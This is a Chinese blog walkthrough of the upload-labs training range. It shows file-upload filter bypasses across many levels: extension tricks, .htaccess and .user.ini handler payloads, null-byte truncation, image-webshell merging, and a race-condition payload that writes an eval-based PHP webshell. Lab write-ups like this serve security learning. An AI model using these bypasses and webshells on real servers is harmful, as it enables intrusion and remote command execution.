upload-labs靶场通关(附靶场环境)

2024-09-01 13:04
文章标签 环境 靶场 upload labs 通关

本文主要是介绍upload-labs靶场通关(附靶场环境),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

链接: https://pan.baidu.com/s/1GQP5zthh598A4Mp-WQM4vA 提取码: zovn

环境搭建

步骤一:将环境附件下载到phpstudy_pro\WWW下面修改名字为upload

步骤二:询问绑定地址

第一关  less-1

步骤一:上传一句话木马

步骤二:更改文件名后缀,将1.php改为1.jpg,利用burp进行抓包

步骤三:更改为1.php进行放包,上传成功

右击图片打开新窗口找到php文件

第二关:less-2

步骤一:更改文件名后缀,将1.php改为1.jpg,利用burp进行抓包

步骤二:更改为1.php进行放包,上传成功

右击图片打开新窗口找到php文件

第三关:less-3

步骤一:php文件重命名为1.php5

步骤二:右击右击图片打开,进行蚁剑连连接

第四关:less-4

步骤一:创建一个.htaccess文件,里面输入内容

<FilesMatch "1.jpg">
SetHandler application/x-httpd-php

</FilesMatch>

步骤二:先上传.htaccess文件,再上传1.jpg,图片右键新建标签页打开图片

步骤三:进行蚁剑连连接

第五关:less-5

步骤一:创建一个.user.ini文件,输入内容auto_prepend_file = "1.jpg"

步骤二:先上传.user,ini文件,再上传1.jpg

步骤三:进行蚁剑连连接

第六关:less-6

步骤一:上传1.php抓包,将1.php改为1.phP,放行

第七关:less-7

步骤一:上传1.php抓包,将1.php后面加空格,放行

步骤二:图片右键新建标签页打开图片

步骤三:进行蚁剑连连接

第八关:less-8

步骤一:上传1.php抓包,将1.php后面加.,放行

步骤二:图片右键新建标签页打开图片

步骤三:进行蚁剑连连接

第九关:less-9

步骤一:上传1.php抓包,将1.php后面加::$DATA,放行

步骤二:图片右键新建标签页打开图片

第十关:less-10

步骤一:上传1.php文件抓包,1.php后面加.空格. 放行

步骤二:图片右键新建标签页打开图片

步骤三:进行蚁剑连连接

第十一关:less-11

步骤一:将1.php改为1.pphphp


步骤二:图片右键新建标签页打开图片

步骤三:进行蚁剑连连接

第十二关:less-12

步骤一:上传1.php文件抓包,将/upload/后面添加随便一个php文件%00,1.php改为1.jpg 放行

步骤二:图片右键新建标签页打开图片,删掉�/9320240830163621.jpg访问

第十三关:less-13

步骤一:上传1.php文件抓包,将/upload/后面添加随便一个php文件加空格,1.php改为1.jpg

步骤二:打开Hex,将6.php后面的空格对应的20改为00,放行

步骤三:图片右键新建标签页打开图片,删掉�/5320240830164829.jpg访问

第十四关:less-14

步骤一:将一张图片和一个php文件放在cmd根目录,运行copy a.jpg/b+1.php/a shell.jpg

步骤二:上传shell.jpg,图片右键新建标签页打开图片,打开文件包含漏洞,用file读取图片地址

第十五关:less-15

步骤一:上传shell.jpg,图片右键新建标签页打开图片,打开文件包含漏洞,用file读取图片地址

第十六关:less-16

环境不支持

第十七关:less-17

步骤一:图片需要二次渲染,上传图片,图片右键新建标签页打开图片,打开文件包含漏洞,用file读取图片地址

步骤二:进行蚁剑连连接

第十八关:less-18

步骤一:php文件输入<?php fputs(fopen('webshell.php','w'),'<?php @eval($_POST["cmd"])?>');?>

步骤二:上传文件,burp抓包,发送到 intruder 模块,设置⽆限发送空的payloads,无限重复;

步骤三:访问1.php抓包,发送到 intruder 模块,设置⽆限发送空的payloads,无限重复;

步骤四:同时攻击,直到出现webshell.php

步骤五:访问webshell.php,进行蚁剑连连接

第二十关:less-20

步骤一上传php文件,保存名称改为1.php/.

这篇关于upload-labs靶场通关(附靶场环境)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1127010

相关文章

IntelliJ IDEA 中配置 Spring MVC 环境的详细步骤及问题解决

《IntelliJIDEA中配置SpringMVC环境的详细步骤及问题解决》:本文主要介绍IntelliJIDEA中配置SpringMVC环境的详细步骤及问题解决,本文分步骤结合实例给大... 目录步骤 1:创建 Maven Web 项目步骤 2:添加 Spring MVC 依赖1、保存后执行2、将新的依赖

Python如何自动生成环境依赖包requirements

《Python如何自动生成环境依赖包requirements》:本文主要介绍Python如何自动生成环境依赖包requirements问题,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑... 目录生成当前 python 环境 安装的所有依赖包1、命令2、常见问题只生成当前 项目 的所有依赖包1、

Redis在windows环境下如何启动

《Redis在windows环境下如何启动》:本文主要介绍Redis在windows环境下如何启动的实现方式,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录Redis在Windows环境下启动1.在redis的安装目录下2.输入·redis-server.exe

Pytest多环境切换的常见方法介绍

《Pytest多环境切换的常见方法介绍》Pytest作为自动化测试的主力框架,如何实现本地、测试、预发、生产环境的灵活切换,本文总结了通过pytest框架实现自由环境切换的几种方法,大家可以根据需要进... 目录1.pytest-base-url2.hooks函数3.yml和fixture结论你是否也遇到过

浅谈配置MMCV环境,解决报错,版本不匹配问题

《浅谈配置MMCV环境,解决报错,版本不匹配问题》:本文主要介绍浅谈配置MMCV环境,解决报错,版本不匹配问题,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录配置MMCV环境,解决报错,版本不匹配错误示例正确示例总结配置MMCV环境,解决报错,版本不匹配在col

Centos环境下Tomcat虚拟主机配置详细教程

《Centos环境下Tomcat虚拟主机配置详细教程》这篇文章主要讲的是在CentOS系统上,如何一步步配置Tomcat的虚拟主机,内容很简单,从目录准备到配置文件修改,再到重启和测试,手把手带你搞定... 目录1. 准备虚拟主机的目录和内容创建目录添加测试文件2. 修改 Tomcat 的 server.X

VSCode配置Anaconda Python环境的实现

《VSCode配置AnacondaPython环境的实现》VisualStudioCode中可以使用Anaconda环境进行Python开发,本文主要介绍了VSCode配置AnacondaPytho... 目录前言一、安装 Visual Studio Code 和 Anaconda二、创建或激活 conda

pytorch+torchvision+python版本对应及环境安装

《pytorch+torchvision+python版本对应及环境安装》本文主要介绍了pytorch+torchvision+python版本对应及环境安装,安装过程中需要注意Numpy版本的降级,... 目录一、版本对应二、安装命令(pip)1. 版本2. 安装全过程3. 命令相关解释参考文章一、版本对

国内环境搭建私有知识问答库踩坑记录(ollama+deepseek+ragflow)

《国内环境搭建私有知识问答库踩坑记录(ollama+deepseek+ragflow)》本文给大家利用deepseek模型搭建私有知识问答库的详细步骤和遇到的问题及解决办法,感兴趣的朋友一起看看吧... 目录1. 第1步大家在安装完ollama后,需要到系统环境变量中添加两个变量2. 第3步 “在cmd中

Windows环境下安装达梦数据库的完整步骤

《Windows环境下安装达梦数据库的完整步骤》达梦数据库的安装大致分为Windows和Linux版本,本文将以dm8企业版Windows_64位环境为例,为大家介绍一下达梦数据库的具体安装步骤吧... 目录环境介绍1 下载解压安装包2 根据安装手册安装2.1 选择语言 时区2.2 安装向导2.3 接受协议